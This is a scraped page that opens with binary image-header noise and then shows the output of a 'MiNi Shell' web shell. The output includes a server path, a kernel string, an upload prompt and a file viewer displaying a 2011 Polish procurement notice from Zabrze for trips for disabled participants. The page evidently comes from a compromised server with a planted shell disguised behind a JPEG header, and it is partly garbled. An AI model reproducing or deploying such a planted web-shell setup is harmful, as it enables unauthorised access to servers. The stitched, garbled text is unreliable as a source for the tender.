JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/108587-N-2011.html

<p class="kh_header"><b>Zabrze: Zorganizowanie trzech jednodniowych wyjazdów integracyjnych dla niepełnosprawnych uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze</b><br>
<b>Numer ogłoszenia: 108587 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Roosevelta 40, 41-800 Zabrze, woj. śląskie, tel. 032 2777800, faks 032 2777802.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.zabrze.magistrat.pl, www.mopr.zabrze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie trzech jednodniowych wyjazdów integracyjnych dla niepełnosprawnych uczestników projektu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja trzech jednodniowych wyjazdów integracyjnych dla niepełnosprawnych uczestników projektu współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze, obejmujących wyjazd do:
1.	Doliny Morskiego Oka 
2.	Krakowa
3.	Tarnowskich Gór
CPV: 60100000-9 - usługi w zakresie transportu drogowego
63511000-4 - organizacja wycieczek
Jednodniowe wycieczki odbędą się w proponowanych przez Zamawiającego dniach:
I termin - 14 czerwca 2011 r. (wtorek) - Wyjazd do Doliny Morskiego Oka
II termin - 13 września 2011 r.  (wtorek) - Wyjazd do Krakowa
III termin - 25 października 2011 r. (wtorek) - Wyjazd do Tarnowskich Gór
1.	Wyjazd do Doliny Morskiego Oka:
Na jednodniową wycieczkę musi składać się m. in. transport luksusowym autokarem wraz z ubezpieczeniem od następstw nieszczęśliwych wypadków dla każdego uczestnika i opiekunów, wszystkie opłaty drogowe i parkingowe obejmujące całą trasę wycieczki, opieka licencjonowanego przewodnika, przejazd wozami konnymi spod Morskiego Oka - Schronisko do miejsca parkingowego w Palenicy Białczańskiej dla każdego uczestnika i opiekuna, wyżywienie. 
Zamówienie obejmuje wyjazd ze wskazanego przez zamawiającego miejsca tj. centrum Zabrza - parking przy ul. Roosevelta 40 o godzinie 6.00, przejazd autostradą A4 do Palenicy Białczańskiej, przemarsz do Morskiego Oka, zwiedzanie okolicy Morskiego Oka, dla chętnych możliwość podejścia pod Czarny Staw pod Rysami, powrót z Morskiego Oka - Schronisko wozami konnymi do miejsca parkingowego w Palenicy Białczańskiej, powrót z Palenicy Białczańskiej godz. 18.00, przejazd autostradą A4 do Zabrza, planowany przyjazd do centrum Zabrza - parking przy ul. Roosevelta 40 ok. godz. 22.00.
Wykonawca zobowiązany jest w cenie wycieczki zapewnić wyżywienie w postaci tzw. suchego prowiantu tj. 2 bułek (bułka ok. 100g - okrągła lub typu hot-dog z masłem, szynką, serem, ogórkiem zielonym, pomidorem) na osobę, woda mineralna niegazowana 1,5l na osobę, sok owocowy ok. 0,5l na osobę, jabłko słodko-kwaśne w ilości 1 szt na osobę, wafel oblewany czekoladą ok. 52g w ilości 1 szt na  osobę oraz ciepły posiłek w schronisku w postaci jednego dania na osobę np. placki ziemniaczane, herbata. 
Wykonawca zobowiązany jest sporządzić i przekazać Zamawiającemu szczegółowy program wycieczki  na co najmniej 3 dni przed terminem wyjazdu uwzględniając planowany czas od godziny 6.00 (wyjazd z centrum Zabrza) do 22.00 (godz. przyjazdu do centrum Zabrza) oraz proponowany zakup żywności w schronisku. 
2.	Wyjazd do Krakowa:
Na jednodniową wycieczkę musi składać się m. in. transport autokarem wraz z ubezpieczeniem od następstw nieszczęśliwych wypadków dla każdego uczestnika i opiekunów, wszystkie opłaty drogowe i parkingowe obejmujące całą trasę wycieczki, bilety wstępu do Smoczej jamy, opieka licencjonowanego przewodnika, wyżywienie. 
Zamówienie obejmuje wyjazd ze wskazanego przez zamawiającego miejsca tj. centrum Zabrza - parking przy ul. Roosevelta 40 o godzinie 7.00, przejazd autostradą A4 do centrum Krakowa, zwiedzanie m.in. Rynku, Sukiennic, Kościoła Mariackiego, Wawel, Starego miasta, Smoczej jamy, powrót z Krakowa godz. 17.00, przejazd autostradą A4 do Zabrza, planowany przyjazd do centrum Zabrza - parking przy ul. Roosevelta 40 ok. godz. 19.00.
Wykonawca zobowiązany jest w cenie wycieczki zapewnić wyżywienie w postaci tzw. suchego prowiantu tj. 2 bułek (bułka ok. 100g - okrągła lub typu hot-dog z masłem, szynką, serem, ogórkiem zielonym, pomidorem) na osobę, woda mineralna niegazowana 1,5l na osobę, sok owocowy ok. 0,5l na osobę, jabłko słodko-kwaśne w ilości 1 szt na osobę, wafel oblewany czekoladą ok. 52g w ilości 1 szt na osobę. 
Wykonawca zobowiązany jest sporządzić i przekazać Zamawiającemu szczegółowy program wycieczki  na co najmniej 3 dni przed terminem wyjazdu uwzględniając planowany czas od godziny 7.00 (wyjazd z centrum Zabrza) do 19.00 (godz. przyjazdu do centrum Zabrza). 
3.	Wyjazd do Tarnowskich Gór:
Na jednodniową wycieczkę musi składać się m. in. transport autokarem wraz z ubezpieczeniem od następstw nieszczęśliwych wypadków dla każdego uczestnika i opiekunów, wszystkie opłaty drogowe i parkingowe obejmujące całą trasę wycieczki, bilety wstępu do Kopalni srebra w Tarnowskich Górach dla każdego uczestnika i opiekuna, bilety wstępu do Parku wodnego w Tarnowskich Górach obejmujący pobyt 2 godzinny na basenie dla każdego uczestnika i opiekuna.
Zamówienie obejmuje wyjazd ze wskazanego przez zamawiającego miejsca tj. centrum Zabrza - parking przy ul. Roosevelta 40 o godzinie 9.00, powrót z Tarnowskich Gór o godz. 16.00, planowany przyjazd do centrum Zabrza - parking przy ul. Roosevelta 40 ok. godz. 17.00.
Wykonawca zobowiązany jest sporządzić i przekazać Zamawiającemu szczegółowy program wycieczki  na co najmniej 3 dni przed terminem wyjazdu uwzględniając planowany czas od godziny 9.00 (wyjazd z centrum Zabrza) do 17.00 (godz. przyjazdu do centrum Zabrza). 
Opis  dodatkowy: 
Przewidziana ilość uczestników: na jedną z każdych jednodniowych wycieczek przewidziano ilość minimalną 30 osób, maksymalną 40 uczestników projektu oraz dodatkowo 2 opiekunów grupy. W cenie każdej wycieczki należy uwzględnić koszt opiekunów ze strony Zamawiającego. Wykonawca zobowiązuje się do zapewnienia dodatkowo jednego przedstawiciela firmy (opiekuna wycieczki) w trakcie trwania każdej wycieczki, którego obowiązkiem będzie czuwanie nad prawidłowym wykonaniem zamówienia.
Ilość uczestników każdej wycieczki zostanie ustalona przez Zamawiającego i przekazana Wykonawcy telefonicznie w terminie nie krótszym niż 7 dni przed dniem planowanego wyjazdu.  
Wykonawca zobowiązany jest do zapewnienia pojazdu dopuszczonego do ruchu zgodnie z obowiązującym na terenie Rzeczpospolitej Polskiej prawem tj. na dzień rozpoczęcia usługi pojazd musi posiadać aktualne badania techniczne dopuszczające do ruchu. Autokar musi posiadać WC. Wykonawca zapewni podstawienie autokaru na wybrany przez Zamawiającego parking na co najmniej 15 minut przed planowanym wyjazdem. Zamawiający zaznacza, iż zastrzega sobie prawo do wezwania odpowiednich służb w celu kontroli stanu technicznego pojazdu i trzeźwości kierowcy. W przypadku awarii pojazdu lub sytuacji, o której mowa powyżej Wykonawca zobowiązany będzie we własnym zakresie zapewnić sprawny pojazd zastępczy w celu ciągłości świadczenia usług będących przedmiotem umowy w tym samym dniu lub w innym dogodnym dla Zamawiającego terminie.
W przypadku, gdy wystąpi okoliczność, że zbędnym lub niemożliwym stanie się zorganizowanie wycieczki dla liczby osób wskazanych w specyfikacji istotnych warunków zamówienia, Zamawiający zastrzega sobie prawo zmniejszenia liczby przewidzianych osób na każdą wycieczkę maksymalnie o 10% w stosunku do minimalnej liczby uczestników. Dopuszcza się możliwość rezygnacji przez uczestnika projektu z wycieczki na 3 dni przed jej rozpoczęciem, Zamawiający nie pokrywa wówczas kosztów za taką osobę lub skieruje inną osobę.
Łączna kwota zamówienia musi obejmować m.in. cenę transportu wraz z ubezpieczeniem od następstw nieszczęśliwych wypadków każdego uczestnika, wszystkie opłaty drogowe i parkingowe obejmujące całą trasę wycieczek, bilety wstępu do wymienionych wyżej obiektów dla każdego uczestnika, opieka licencjonowanego przewodnika, wyżywienie.
Zastrzegamy prawo unieważnienia umowy w sprawie zamówienia publicznego, jeżeli środki pochodzące z budżetu Unii Europejskiej, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały mu przyznane.
Wystąpienie kosztów związanych z ewentualną zmianą programu, przedłużeniem czasu trwania wyjazdu i innych nie przewidzianych okoliczności nie powoduje zwiększenia wynagrodzenia Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nastąpi na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2  do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie) oraz dołączonych dokumentów wskazanych w  Rozdziale IV SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nastąpi na podstawie  przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu  -  załącznik nr 2 do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie) oraz Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonania przedmiotu zamówienia polegającym na wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług o tematyce będącej przedmiotem postępowania lub podobne o wartości 4.000 zł netto każda, z podaniem ich wartości, przedmiotu, dat wykonania oraz załączeniem dokumentu potwierdzającego, że usługa ta została wykonana należycie tzw. list referencyjny - załącznik nr 5 do SIWZ. 
UWAGA! Należy wykazać się realizacją minimum 2 usług o podanej wartości każda!
Usługa musi polegać na łącznej realizacji i organizacji na rzecz jednego podmiotu wyjazdu o podanej wartości do atrakcyjnej miejscowości turystycznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nastąpi na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu  -  załącznik nr 2 do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nastąpi na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu  -  załącznik nr 2 do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nastąpi na podstawie przedstawionego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo rodzajowe
listy referencyjne
parafpwany wzór umowy na każdej stronie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień w zawartej umowie wprowadzonych aneksem takich jak: 
- zmiana osób funkcyjnych - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana sposobu reprezentacji - z przyczyn niezależnych od Zamawiającego i Wykonawcy
- zmiana adresu siedziby jednej ze stron - z przyczyn zewnętrznych
- zmiana terminu realizacji zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych  
  przez Zamawiającego
- zmiana limitów osób
- zmiana miejsca realizacji zamówienia na podstawie obiektywnych przesłanek zaakceptowanych  
  przez Zamawiającego na miejsce o zbliżonym lub takim samym standardzie
- wprowadzenie informacji dodatkowych związanych z nowymi wytycznymi w realizacji Projektu.
- wprowadzenie lub zmiana podwykonawcy - w uzasadnionych przypadkach, za pisemną zgodą Zamawiającego
- zmiana godzin realizacji zamówienia
- zmiana programu wycieczki</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.zabrze.pl www.mopr.zabrze.magistrat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MIEJSKI OŚRODEK POMOCY RODZINIE W ZABRZU UL. ROOSEVELTA 40 41-800 ZABRZE POKOJ 216 II PIETRO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2011 godzina 09:00, miejsce: MIEJSKI OŚRODEK POMOCY RODZINIE W ZABRZU UL. ROOSEVELTA 40 41-800 ZABRZE POKOJ 117 I PIETRO.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego pt. Reintegracja, Aktywność, Praca. Program na rzecz integracji społeczno-zawodowej w gminie Zabrze.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com